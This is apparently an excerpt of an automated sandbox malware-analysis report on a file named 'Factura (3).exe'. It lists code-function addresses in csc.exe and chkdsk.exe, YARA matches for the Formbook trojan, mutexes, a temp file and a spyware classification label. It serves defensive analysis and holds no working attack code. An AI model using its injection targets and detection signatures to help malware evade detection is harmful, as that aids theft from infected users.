            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_004028DD14_2_004028DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_004028E014_2_004028E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040309014_2_00403090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040120014_2_00401200
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00404B9714_2_00404B97
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00402BA014_2_00402BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0042D54314_2_0042D543
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040FD3314_2_0040FD33
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0041661E14_2_0041661E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0041662314_2_00416623
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_004026AE14_2_004026AE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_00401EB014_2_00401EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_004026B014_2_004026B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040375014_2_00403750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040FF5314_2_0040FF53
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040DFCA14_2_0040DFCA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0040DFD314_2_0040DFD3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B053514_2_053B0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546757114_2_05467571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547059114_2_05470591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544D5B014_2_0544D5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546244614_2_05462446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A146014_2_053A1460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546F43F14_2_0546F43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545E4F614_2_0545E4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B077014_2_053B0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D475014_2_053D4750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546F7B014_2_0546F7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AC7C014_2_053AC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054616CC14_2_054616CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CC6E014_2_053CC6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547B16B14_2_0547B16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A010014_2_053A0100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539F17214_2_0539F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053E516C14_2_053E516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544A11814_2_0544A118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054681CC14_2_054681CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BB1B014_2_053BB1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054701AA14_2_054701AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545F0CC14_2_0545F0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546F0E014_2_0546F0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054670E914_2_054670E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B70C014_2_053B70C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546A35214_2_0546A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546132D14_2_0546132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0539D34C14_2_0539D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054703E614_2_054703E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053F739A14_2_053F739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BE3F014_2_053BE3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545027414_2_05450274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B52A014_2_053B52A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_054512ED14_2_054512ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CB2C014_2_053CB2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05461D5A14_2_05461D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05467D7314_2_05467D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BAD0014_2_053BAD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B3D4014_2_053B3D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C8DBF14_2_053C8DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AADE014_2_053AADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CFDC014_2_053CFDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0C0014_2_053B0C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05429C3214_2_05429C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546FCF214_2_0546FCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A0CF214_2_053A0CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05450CB514_2_05450CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05424F4014_2_05424F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053D0F3014_2_053D0F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053F2F2814_2_053F2F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546FF0914_2_0546FF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B1F9214_2_053B1F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BCFE014_2_053BCFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053A2FC814_2_053A2FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546FFB114_2_0546FFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546EE2614_2_0546EE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B0E5914_2_053B0E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B9EB014_2_053B9EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546EEDB14_2_0546EEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C2E9014_2_053C2E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546CE9314_2_0546CE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053C696214_2_053C6962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B995014_2_053B9950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CB95014_2_053CB950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B29A014_2_053B29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0547A9A614_2_0547A9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0541D80014_2_0541D800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053BA84014_2_053BA840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B284014_2_053B2840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053968B814_2_053968B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053DE8F014_2_053DE8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053B38E014_2_053B38E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546AB4014_2_0546AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546FB7614_2_0546FB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05466BD714_2_05466BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053CFB8014_2_053CFB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053EDBF914_2_053EDBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05467A4614_2_05467A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0546FA4914_2_0546FA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_05423A6C14_2_05423A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0545DAC614_2_0545DAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053F5AA014_2_053F5AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_053AEA8014_2_053AEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 14_2_0544DAAC14_2_0544DAAC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F053523_2_053F0535
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A757123_2_054A7571
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054B059123_2_054B0591
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0548D5B023_2_0548D5B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A244623_2_054A2446
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053E146023_2_053E1460
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AF43F23_2_054AF43F
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0549E4F623_2_0549E4F6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0541475023_2_05414750
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F077023_2_053F0770
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AF7B023_2_054AF7B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053EC7C023_2_053EC7C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A16CC23_2_054A16CC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0540C6E023_2_0540C6E0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054BB16B23_2_054BB16B
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0542516C23_2_0542516C
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053E010023_2_053E0100
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053DF17223_2_053DF172
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0548A11823_2_0548A118
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A81CC23_2_054A81CC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053FB1B023_2_053FB1B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054B01AA23_2_054B01AA
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0549F0CC23_2_0549F0CC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A70E923_2_054A70E9
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AF0E023_2_054AF0E0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F70C023_2_053F70C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AA35223_2_054AA352
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A132D23_2_054A132D
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053DD34C23_2_053DD34C
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054B03E623_2_054B03E6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053FE3F023_2_053FE3F0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0543739A23_2_0543739A
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0549027423_2_05490274
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0540B2C023_2_0540B2C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F52A023_2_053F52A0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054912ED23_2_054912ED
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A1D5A23_2_054A1D5A
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A7D7323_2_054A7D73
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053FAD0023_2_053FAD00
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F3D4023_2_053F3D40
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0540FDC023_2_0540FDC0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053EADE023_2_053EADE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05408DBF23_2_05408DBF
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F0C0023_2_053F0C00
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05469C3223_2_05469C32
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AFCF223_2_054AFCF2
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053E0CF223_2_053E0CF2
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05490CB523_2_05490CB5
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05464F4023_2_05464F40
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AFF0923_2_054AFF09
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05432F2823_2_05432F28
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05410F3023_2_05410F30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F1F9223_2_053F1F92
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053FCFE023_2_053FCFE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053E2FC823_2_053E2FC8
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AFFB123_2_054AFFB1
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F0E5923_2_053F0E59
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AEE2623_2_054AEE26
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F9EB023_2_053F9EB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AEEDB23_2_054AEEDB
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05402E9023_2_05402E90
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054ACE9323_2_054ACE93
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0540B95023_2_0540B950
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0540696223_2_05406962
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F995023_2_053F9950
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F29A023_2_053F29A0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054BA9A623_2_054BA9A6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053FA84023_2_053FA840
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F284023_2_053F2840
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053D68B823_2_053D68B8
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0541E8F023_2_0541E8F0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F38E023_2_053F38E0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AAB4023_2_054AAB40
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AFB7623_2_054AFB76
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A6BD723_2_054A6BD7
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0542DBF923_2_0542DBF9
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0540FB8023_2_0540FB80
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AFA4923_2_054AFA49
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A7A4623_2_054A7A46
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05463A6C23_2_05463A6C
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0549DAC623_2_0549DAC6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053EEA8023_2_053EEA80
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05435AA023_2_05435AA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0548DAAC23_2_0548DAAC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0076111023_2_00761110
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_007511A423_2_007511A4
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0075C34023_2_0075C340
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0075C56023_2_0075C560
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0075A5E023_2_0075A5E0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0075A5D723_2_0075A5D7
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00779B5023_2_00779B50
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00762C3023_2_00762C30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00762C2B23_2_00762C2B
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0545EA12 appears 84 times
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0546F290 appears 105 times
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 053DB970 appears 266 times
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 05425130 appears 36 times
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 05437E54 appears 87 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 0541EA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 053F7E54 appears 88 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 0539B970 appears 268 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 0542F290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 053E5130 appears 36 times
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7492 -s 2236
            Source: 14.2.csc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 14.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F04000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
            Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@17/15@15/9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7492
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
            Source: C:\Users\user\Desktop\Factura (3).exe | File created: C:\Users\user\AppData\Local\Temp\file-22993.putik
            Source: Factura (3).exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ParentProcessId FROM Win32_Process WHERE ProcessId = 7492
